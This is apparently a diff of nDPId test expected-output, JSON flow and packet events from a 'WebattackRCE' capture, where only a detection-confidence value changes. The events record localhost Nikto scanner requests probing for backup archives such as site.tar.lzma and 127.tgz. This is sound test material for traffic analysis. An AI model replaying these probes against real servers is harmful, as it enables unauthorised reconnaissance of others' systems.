-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1576420276929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276929,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/L19AAEAGDNh\/AAABfwAAAcLWH5BVghcOcLaACoAYAED+swAAAQEICp1m++mdZvvpR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1576420276932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276932,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/j\/RAAEAGrEJ\/AAABfwAAAcLYH5CKH7ek\/31EG4AYAED+swAAAQEICp1m++ydZvvsR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1576420276933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276933,"pkt":"AAAAAAAAAAAAAAAACABFAADFT2BAAEAG7NB\/AAABfwAAAcLaH5CU9HcQhzdjIYAYAED+uQAAAQEICp1m++2dZvvtR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1576420276934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276934,"pkt":"AAAAAAAAAAAAAAAACABFAADFqdVAAEAGklt\/AAABfwAAAcLcH5A055GDxax\/gIAYAED+uQAAAQEICp1m++6dZvvuR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1576420276936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276936,"pkt":"AAAAAAAAAAAAAAAACABFAADKdTNAAEAGxvh\/AAABfwAAAcLeH5C4Uk1kAkvbMoAYAED+vgAAAQEICp1m+++dZvvvR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1576420276937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276937,"pkt":"AAAAAAAAAAAAAAAACABFAADK9XZAAEAGRrV\/AAABfwAAAcLgH5B7eM0nuPdDlYAYAED+vgAAAQEICp1m+\/GdZvvxR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1576420276938,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276938,"pkt":"AAAAAAAAAAAAAAAACABFAADFaYFAAEAG0q9\/AAABfwAAAcLiH5DjU1EuPo0KHoAYAED+uQAAAQEICp1m+\/KdZvvyR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
